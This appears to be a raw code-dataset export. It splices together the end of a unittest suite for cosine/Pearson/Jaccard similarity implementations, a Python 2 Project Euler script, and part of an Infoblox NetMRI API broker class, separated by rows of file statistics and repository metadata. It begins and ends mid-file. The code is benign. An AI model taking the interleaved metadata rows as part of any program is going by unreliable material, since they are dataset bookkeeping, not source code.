data_matrix = np.array([[1,2,0,1],[0,1,4,1],[1,3,1,0]])
data_matrix = sps.csr_matrix(data_matrix)
cosine_similarity = Cosine_Similarity_Cython(data_matrix, topK=TopK, normalize = True,
shrink=shrink, mode='pearson')
W_dense_Cython = cosine_similarity.compute_similarity()
cosine_similarity = Cosine_Similarity_Python(data_matrix, topK=TopK, normalize = True,
shrink=shrink, mode='pearson')
W_dense_Python = cosine_similarity.compute_similarity()
cosine_similarity = Cosine_Similarity_Parallel(data_matrix, topK=TopK, normalize = True,
shrink=shrink, mode='pearson')
W_dense_Parallel = cosine_similarity.compute_similarity()
data_matrix = data_matrix.toarray().astype(np.float64)
for col in range(data_matrix.shape[1]):
nonzeroMask = data_matrix[:,col]>0
data_matrix[:,col][nonzeroMask] -= np.mean(data_matrix[:,col][nonzeroMask])
W_dense_denominator = np.matlib.repmat((data_matrix**2).sum(axis=0), data_matrix.shape[1], 1)
W_dense_denominator = np.sqrt(W_dense_denominator)
W_dense_denominator = np.multiply(W_dense_denominator, W_dense_denominator.T) + shrink
W_dense_mul = data_matrix.T.dot(data_matrix)
W_dense_mul[W_dense_denominator>0] /= W_dense_denominator[W_dense_denominator>0]
W_dense_mul[np.arange(W_dense_mul.shape[0]),np.arange(W_dense_mul.shape[0])] = 0.0
assert np.allclose(W_dense_Cython, W_dense_mul, atol=1e-4), "W_dense_Cython not matching control"
assert np.allclose(W_dense_Python, W_dense_mul, atol=1e-4), "W_dense_Python not matching control"
assert np.allclose(W_dense_Parallel, W_dense_mul, atol=1e-4), "W_dense_Parallel not matching control"
def test_cosine_similarity_dense_jaccard(self):
from Base.Cython.cosine_similarity import Cosine_Similarity as Cosine_Similarity_Cython
from Base.cosine_similarity import Compute_Similarity as Cosine_Similarity_Python
from Base.cosine_similarity_parallel import Cosine_Similarity_Parallel as Cosine_Similarity_Parallel
import numpy.matlib
TopK = 0
shrink = 0
data_matrix = np.array([[1,2,0,1],[0,1,4,1],[1,3,1,0]])
data_matrix = sps.csr_matrix(data_matrix)
cosine_similarity = Cosine_Similarity_Cython(data_matrix, topK=TopK, normalize = True,
shrink=shrink, mode='jaccard')
W_dense_Cython = cosine_similarity.compute_similarity()
cosine_similarity = Cosine_Similarity_Python(data_matrix, topK=TopK, normalize = True,
shrink=shrink, mode='jaccard')
W_dense_Python = cosine_similarity.compute_similarity()
cosine_similarity = Cosine_Similarity_Parallel(data_matrix, topK=TopK, normalize = True,
shrink=shrink, mode='jaccard')
W_dense_Parallel = cosine_similarity.compute_similarity()
data_matrix.data = np.ones_like(data_matrix.data)
data_matrix = data_matrix.toarray().astype(np.float64)
W_dense_mul = data_matrix.T.dot(data_matrix)
W_dense_denominator = np.matlib.repmat((data_matrix**2).sum(axis=0), data_matrix.shape[1], 1)
W_dense_denominator = W_dense_denominator + W_dense_denominator.T - W_dense_mul + shrink
W_dense_mul[W_dense_denominator>0] /= W_dense_denominator[W_dense_denominator>0]
W_dense_mul[np.arange(W_dense_mul.shape[0]),np.arange(W_dense_mul.shape[0])] = 0.0
assert np.allclose(W_dense_Cython, W_dense_mul, atol=1e-4), "W_dense_Cython not matching control"
assert np.allclose(W_dense_Python, W_dense_mul, atol=1e-4), "W_dense_Python not matching control"
assert np.allclose(W_dense_Parallel, W_dense_mul, atol=1e-4), "W_dense_Parallel not matching control"
def test_cosine_similarity_dense_big(self):
from Base.Cython.cosine_similarity import Cosine_Similarity as Cosine_Similarity_Cython
from Base.cosine_similarity import Compute_Similarity as Cosine_Similarity_Python
from Base.cosine_similarity_parallel import Cosine_Similarity_Parallel as Cosine_Similarity_Parallel
TopK = 0
n_items = 500
n_users = 1000
data_matrix = sps.random(n_users, n_items, density=0.1)
cosine_similarity = Cosine_Similarity_Cython(data_matrix, topK=TopK, normalize = False)
W_dense_Cython = cosine_similarity.compute_similarity()
cosine_similarity = Cosine_Similarity_Python(data_matrix, topK=TopK, normalize = False)
W_dense_Python = cosine_similarity.compute_similarity()
cosine_similarity = Cosine_Similarity_Parallel(data_matrix, topK=TopK, normalize = False)
W_dense_Parallel = cosine_similarity.compute_similarity()
W_dense_mul = data_matrix.T.dot(data_matrix).toarray()
W_dense_mul[np.arange(W_dense_mul.shape[0]),np.arange(W_dense_mul.shape[0])] = 0.0
assert np.allclose(W_dense_Cython, W_dense_mul, atol=1e-4), "W_dense_Cython not matching control"
assert np.allclose(W_dense_Python, W_dense_mul, atol=1e-4), "W_dense_Python not matching control"
assert np.allclose(W_dense_Parallel, W_dense_mul, atol=1e-4), "W_dense_Parallel not matching control"
def test_cosine_similarity_TopK(self):
from Base.Cython.cosine_similarity import Cosine_Similarity as Cosine_Similarity_Cython
from Base.cosine_similarity import Compute_Similarity as Cosine_Similarity_Python
from Base.cosine_similarity_parallel import Cosine_Similarity_Parallel as Cosine_Similarity_Parallel
TopK=4
data_matrix = np.array([[1,1,0,1],[0,1,1,1],[1,0,1,0]])
data_matrix = sps.csr_matrix(data_matrix)
cosine_similarity = Cosine_Similarity_Cython(data_matrix, topK=TopK, normalize = False)
W_dense_Cython = cosine_similarity.compute_similarity().toarray()
cosine_similarity = Cosine_Similarity_Python(data_matrix, topK=TopK, normalize = False)
W_dense_Python = cosine_similarity.compute_similarity().toarray()
cosine_similarity = Cosine_Similarity_Parallel(data_matrix, topK=TopK, normalize = False)
W_dense_Parallel = cosine_similarity.compute_similarity().toarray()
W_dense_mul = data_matrix.T.dot(data_matrix)
W_dense_mul[np.arange(W_dense_mul.shape[0]),np.arange(W_dense_mul.shape[0])] = 0.0
W_dense_mul = similarityMatrixTopK(W_dense_mul, k=TopK).toarray()
assert np.allclose(W_dense_Cython, W_dense_mul, atol=1e-4), "W_sparse_Cython not matching control"
assert np.allclose(W_dense_Python, W_dense_mul, atol=1e-4), "W_dense_Python not matching control"
assert np.allclose(W_dense_Parallel, W_dense_mul, atol=1e-4), "W_dense_Parallel not matching control"
def test_cosine_similarity_TopK_big(self):
from Base.Cython.cosine_similarity import Cosine_Similarity as Cosine_Similarity_Cython
from Base.cosine_similarity import Compute_Similarity as Cosine_Similarity_Python
from Base.cosine_similarity_parallel import Cosine_Similarity_Parallel as Cosine_Similarity_Parallel
n_items = 500
n_users = 1000
TopK = n_items
data_matrix = sps.random(n_users, n_items, density=0.1)
cosine_similarity = Cosine_Similarity_Cython(data_matrix, topK=TopK, normalize = False)
W_dense_Cython = cosine_similarity.compute_similarity().toarray()
cosine_similarity = Cosine_Similarity_Python(data_matrix, topK=TopK, normalize = False)
W_dense_Python = cosine_similarity.compute_similarity().toarray()
cosine_similarity = Cosine_Similarity_Parallel(data_matrix, topK=TopK, normalize = False)
W_dense_Parallel = cosine_similarity.compute_similarity().toarray()
W_dense_mul = data_matrix.T.dot(data_matrix)
W_dense_mul[np.arange(W_dense_mul.shape[0]),np.arange(W_dense_mul.shape[0])] = 0.0
W_dense_mul = similarityMatrixTopK(W_dense_mul, k=TopK).toarray()
assert np.allclose(W_dense_Cython, W_dense_mul, atol=1e-4), "W_sparse_Cython not matching control"
assert np.allclose(W_dense_Python, W_dense_mul, atol=1e-4), "W_dense_Python not matching control"
assert np.allclose(W_dense_Parallel, W_dense_mul, atol=1e-4), "W_dense_Parallel not matching control"
def runCompilationScript():
# Run compile script setting the working directory to ensure the compiled file are contained in the
# appropriate subfolder and not the project root
compiledModuleSubfolder = "/Cython"
fileToCompile = 'cosine_similarity.pyx'
command = ['python',
'compileCython.py',
fileToCompile,
'build_ext',
'--inplace'
]
output = subprocess.check_output(' '.join(command), shell=True, cwd=os.getcwd() + compiledModuleSubfolder)
try:
command = ['cython',
fileToCompile,
'-a'
]
output = subprocess.check_output(' '.join(command), shell=True, cwd=os.getcwd() + compiledModuleSubfolder)
except:
pass
print("Compiled module saved in subfolder: {}".format(compiledModuleSubfolder))
# Command to run compilation script
# python compileCython.py Compute_Similarity_Cython.pyx build_ext --inplace
# Command to generate html report
# cython -a Compute_Similarity_Cython.pyx
if __name__ == '__main__':
runCompilationScript()
unittest.main()
#
# from data.NetflixEnhanced.NetflixEnhancedReader import NetflixEnhancedReader
#
# from Base.Cython.cosine_similarity import Cosine_Similarity as Cosine_Similarity_Cython
# from Base.Cython.cosine_similarity import cosine_common
#
# from Base.cosine_similarity import Cosine_Similarity as Cosine_Similarity_Python
#
# from Base.Recommender_utils import similarityMatrixTopK
#
# TopK = 100
#
# dataReader = Movielens10MReader()
# #dataReader = NetflixEnhancedReader()
# URM_train = dataReader.get_URM_train()
#
# start_time = time.time()
# cosine_similarity = Cosine_Similarity_Cython(URM_train, TopK=TopK)
# W_sparse_Cython = cosine_similarity.compute_similarity()
# print("Cosine_Similarity_Cython {:.2f} sec, {:.2f} item/sec".format(time.time() - start_time,
# URM_train.shape[1] / (time.time() - start_time)))
#
# start_time = time.time()
# W_cosine_common = cosine_common(URM_train)
# print("Cosine common {:.2f} sec, {:.2f} item/sec".format(time.time()-start_time, URM_train.shape[1] / (time.time() - start_time)))
#
# start_time = time.time()
# cosine_similarity = Cosine_Similarity_Python(URM_train, TopK=TopK)
# W_sparse_Python = cosine_similarity.compute_similarity()
# print("Cosine_Similarity_Python {:.2f} sec, {:.2f} item/sec".format(time.time() - start_time,
# URM_train.shape[1] / (time.time() - start_time)))
#
# start_time = time.time()
# product = URM_train.T.dot(URM_train)
# product[np.arange(product.shape[0]),np.arange(product.shape[0])] = 0.0
#
# W_sparse_Control = similarityMatrixTopK(product, k=TopK).toarray()
# print("similarityMatrixTopK {:.2f} sec, {:.2f} item/sec".format(time.time() - start_time,
# URM_train.shape[1] / (time.time() - start_time)))
| 43.765478 | 136 | 0.704377 | 3,057 | 23,327 | 5.044488 | 0.06248 | 0.084041 | 0.042021 | 0.083458 | 0.887426 | 0.870566 | 0.845276 | 0.827313 | 0.799494 | 0.795733 | 0 | 0.01733 | 0.205942 | 23,327 | 532 | 137 | 43.847744 | 0.815203 | 0.094226 | 0 | 0.701754 | 0 | 0 | 0.070096 | 0.000997 | 0 | 0 | 0 | 0 | 0.115789 | 1 | 0.042105 | false | 0.003509 | 0.150877 | 0 | 0.203509 | 0.003509 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
5818fb0fe9887617c934add7164369c6287decb4 | 1,107 | py | Python | 8-largestProductInASeries.py | cmaron/Project-Euler | c4950302f71ee65d81040fae5764ec9eeef6b1f0 | [
"MIT"
] | 2 | 2015-01-20T14:00:14.000Z | 2016-01-27T16:36:53.000Z | 8-largestProductInASeries.py | cmaron/Project-Euler | c4950302f71ee65d81040fae5764ec9eeef6b1f0 | [
"MIT"
] | null | null | null | 8-largestProductInASeries.py | cmaron/Project-Euler | c4950302f71ee65d81040fae5764ec9eeef6b1f0 | [
"MIT"
] | null | null | null | s = '7316717653133062491922511967442657474235534919493496983520312774506326239578318016984801869478851843858615607891129494954595017379583319528532088055111254069874715852386305071569329096329522744304355766896648950445244523161731856403098711121722383113622298934233803081353362766142828064444866452387493035890729629049156044077239071381051585930796086670172427121883998797908792274921901699720888093776657273330010533678812202354218097512545405947522435258490771167055601360483958644670632441572215539753697817977846174064955149290862569321978468622482839722413756570560574902614079729686524145351004748216637048440319989000889524345065854122758866688116427171479924442928230863465674813919123162824586178664583591245665294765456828489128831426076900422421902267105562632111110937054421750694165896040807198403850962455444362981230987879927244284909188845801561660979191338754992005240636899125607176060588611646710940507754100225698315520005593572972571636269561882670428252483600823257530420752963450'
x = 0
for i in range(0,len(s)):
p = 1
for n in s[i:i+5]:
p *= int(n)
if p > x:
x = p
print x | 110.7 | 1,006 | 0.946703 | 30 | 1,107 | 34.933333 | 0.533333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.937442 | 0.03252 | 1,107 | 10 | 1,007 | 110.7 | 0.041083 | 0 | 0 | 0 | 0 | 0 | 0.902527 | 0.902527 | 0 | 1 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.111111 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
58532ca953fc1e49d4036f872f2b7c6d8dad5024 | 89,187 | py | Python | infoblox_netmri/api/broker/v3_8_0/if_addr_broker.py | infobloxopen/infoblox_netmri | aa1c744df7e439dbe163bb9edd165e4e85a9771b | [
"Apache-2.0"
] | 12 | 2016-02-19T12:37:54.000Z | 2022-03-04T20:11:08.000Z | infoblox_netmri/api/broker/v3_8_0/if_addr_broker.py | azinfoblox/infoblox-netmri | 02372c5231e2677ab6299cb659a73c9a41b4b0f4 | [
"Apache-2.0"
] | 18 | 2015-11-12T18:37:00.000Z | 2021-05-19T07:59:55.000Z | infoblox_netmri/api/broker/v3_8_0/if_addr_broker.py | azinfoblox/infoblox-netmri | 02372c5231e2677ab6299cb659a73c9a41b4b0f4 | [
"Apache-2.0"
] | 18 | 2016-01-07T12:04:34.000Z | 2022-03-31T11:05:41.000Z | from ..broker import Broker
class IfAddrBroker(Broker):
controller = "if_addrs"
def show(self, **kwargs):
"""Shows the details for the specified if addr.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param IfAddrID: The internal NetMRI identifier for this interface address (the specific address configured on this specific interface).
:type IfAddrID: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of if addr methods. The listed methods will be called on each if addr returned and included in the output. Available methods are: vrf_name, vrf_description, vrf_rd, network_id, cap_if_net_provisioning_ipv4_ind, cap_if_net_provisioning_ipv6_ind, cap_if_net_deprovisioning_ipv4_ind, cap_if_net_deprovisioning_ipv6_ind, meta, data_source, device, interface.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: meta, data_source, device, interface.
:type include: Array of String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return if_addr: The if addr identified by the specified IfAddrID.
:rtype if_addr: IfAddr
"""
return self.api_request(self._get_method_fullname("show"), kwargs)
def index(self, **kwargs):
"""Lists the available if addrs. Any of the inputs listed may be be used to narrow the list; other inputs will be ignored. Of the various ways to query lists, using this method is most efficient.
**Inputs**
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the device containing the interface configured with this address.
:type DeviceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the device containing the interface configured with this address.
:type DeviceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param IfAddrID: The internal NetMRI identifier for this interface address (the specific address configured on this specific interface).
:type IfAddrID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param IfAddrID: The internal NetMRI identifier for this interface address (the specific address configured on this specific interface).
:type IfAddrID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param InterfaceID: The internal NetMRI identifier for the interface configured with this address.
:type InterfaceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param InterfaceID: The internal NetMRI identifier for the interface configured with this address.
:type InterfaceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param SubnetIPNumeric: The numerical value of the network portion of the IP address.
:type SubnetIPNumeric: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param SubnetIPNumeric: The numerical value of the network portion of the IP address.
:type SubnetIPNumeric: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param ifIPDotted: The IP address in dotted (or colon-delimited for IPv6) format.
:type ifIPDotted: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param ifIPDotted: The IP address in dotted (or colon-delimited for IPv6) format.
:type ifIPDotted: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param ifIPNumeric: The numerical value of the IP address.
:type ifIPNumeric: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param ifIPNumeric: The numerical value of the IP address.
:type ifIPNumeric: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the if addrs as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of if addr methods. The listed methods will be called on each if addr returned and included in the output. Available methods are: vrf_name, vrf_description, vrf_rd, network_id, cap_if_net_provisioning_ipv4_ind, cap_if_net_provisioning_ipv6_ind, cap_if_net_deprovisioning_ipv4_ind, cap_if_net_deprovisioning_ipv6_ind, meta, data_source, device, interface.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: meta, data_source, device, interface.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` IfAddrID
:param sort: The data field(s) to use for sorting the output. Default is IfAddrID. Valid values are IfAddrID, InterfaceID, DeviceID, ifIndex, DataSourceID, AddrStartTime, AddrEndTime, AddrChangedCols, AddrTimestamp, ifIPDotted, ifIPNumeric, ifNetMaskDotted, ifNetMaskNumeric, SubnetIPNumeric, SubnetIPDotted, AciBdID, AciEpgID.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each IfAddr. Valid values are IfAddrID, InterfaceID, DeviceID, ifIndex, DataSourceID, AddrStartTime, AddrEndTime, AddrChangedCols, AddrTimestamp, ifIPDotted, ifIPNumeric, ifNetMaskDotted, ifNetMaskNumeric, SubnetIPNumeric, SubnetIPDotted, AciBdID, AciEpgID. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param NetworkID: The network id to which results would be limited.
:type NetworkID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return if_addrs: An array of the IfAddr objects that match the specified input criteria.
:rtype if_addrs: Array of IfAddr
"""
return self.api_list_request(self._get_method_fullname("index"), kwargs)
def search(self, **kwargs):
"""Lists the available if addrs matching the input criteria. This method provides a more flexible search interface than the index method, but searching using this method is more demanding on the system and will not perform to the same level as the index method. The input fields listed below will be used as in the index method, to filter the result, along with the optional query string and XML filter described below.
**Inputs**
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param AciBdID: ID of ACI bridge domain the device is assigned to
:type AciBdID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param AciBdID: ID of ACI bridge domain the device is assigned to
:type AciBdID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param AciEpgID: ID of ACI EPG the device is assigned to
:type AciEpgID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param AciEpgID: ID of ACI EPG the device is assigned to
:type AciEpgID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param AddrChangedCols: The fields that changed between this revision of the record and the previous revision.
:type AddrChangedCols: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param AddrChangedCols: The fields that changed between this revision of the record and the previous revision.
:type AddrChangedCols: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param AddrEndTime: The ending effective time of this revision of this record, or empty if still in effect.
:type AddrEndTime: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param AddrEndTime: The ending effective time of this revision of this record, or empty if still in effect.
:type AddrEndTime: Array of DateTime
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param AddrStartTime: The starting effective time of this revision of the record.
:type AddrStartTime: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param AddrStartTime: The starting effective time of this revision of the record.
:type AddrStartTime: Array of DateTime
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param AddrTimestamp: The date and time this record was collected or calculated.
:type AddrTimestamp: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param AddrTimestamp: The date and time this record was collected or calculated.
:type AddrTimestamp: Array of DateTime
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record.
:type DataSourceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record.
:type DataSourceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the device containing the interface configured with this address.
:type DeviceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the device containing the interface configured with this address.
:type DeviceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param IfAddrID: The internal NetMRI identifier for this interface address (the specific address configured on this specific interface).
:type IfAddrID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param IfAddrID: The internal NetMRI identifier for this interface address (the specific address configured on this specific interface).
:type IfAddrID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param InterfaceID: The internal NetMRI identifier for the interface configured with this address.
:type InterfaceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param InterfaceID: The internal NetMRI identifier for the interface configured with this address.
:type InterfaceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param SubnetIPDotted: The network portion of the IP address in dotted (or colon-delimited for IPv6) format.
:type SubnetIPDotted: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param SubnetIPDotted: The network portion of the IP address in dotted (or colon-delimited for IPv6) format.
:type SubnetIPDotted: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param SubnetIPNumeric: The numerical value of the network portion of the IP address.
:type SubnetIPNumeric: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param SubnetIPNumeric: The numerical value of the network portion of the IP address.
:type SubnetIPNumeric: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param ifIPDotted: The IP address in dotted (or colon-delimited for IPv6) format.
:type ifIPDotted: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param ifIPDotted: The IP address in dotted (or colon-delimited for IPv6) format.
:type ifIPDotted: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param ifIPNumeric: The numerical value of the IP address.
:type ifIPNumeric: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param ifIPNumeric: The numerical value of the IP address.
:type ifIPNumeric: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param ifIndex: The SNMP interface index of the interface configured with this address.
:type ifIndex: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param ifIndex: The SNMP interface index of the interface configured with this address.
:type ifIndex: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param ifNetMaskDotted: The network mask value in dotted (or colon-delimited for IPv6) format.
:type ifNetMaskDotted: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param ifNetMaskDotted: The network mask value in dotted (or colon-delimited for IPv6) format.
:type ifNetMaskDotted: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param ifNetMaskNumeric: The numerical value of the network mask.
:type ifNetMaskNumeric: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param ifNetMaskNumeric: The numerical value of the network mask.
:type ifNetMaskNumeric: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the if addrs as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of if addr methods. The listed methods will be called on each if addr returned and included in the output. Available methods are: vrf_name, vrf_description, vrf_rd, network_id, cap_if_net_provisioning_ipv4_ind, cap_if_net_provisioning_ipv6_ind, cap_if_net_deprovisioning_ipv4_ind, cap_if_net_deprovisioning_ipv6_ind, meta, data_source, device, interface.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: meta, data_source, device, interface.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` IfAddrID
:param sort: The data field(s) to use for sorting the output. Default is IfAddrID. Valid values are IfAddrID, InterfaceID, DeviceID, ifIndex, DataSourceID, AddrStartTime, AddrEndTime, AddrChangedCols, AddrTimestamp, ifIPDotted, ifIPNumeric, ifNetMaskDotted, ifNetMaskNumeric, SubnetIPNumeric, SubnetIPDotted, AciBdID, AciEpgID.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each IfAddr. Valid values are IfAddrID, InterfaceID, DeviceID, ifIndex, DataSourceID, AddrStartTime, AddrEndTime, AddrChangedCols, AddrTimestamp, ifIPDotted, ifIPNumeric, ifNetMaskDotted, ifNetMaskNumeric, SubnetIPNumeric, SubnetIPDotted, AciBdID, AciEpgID. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
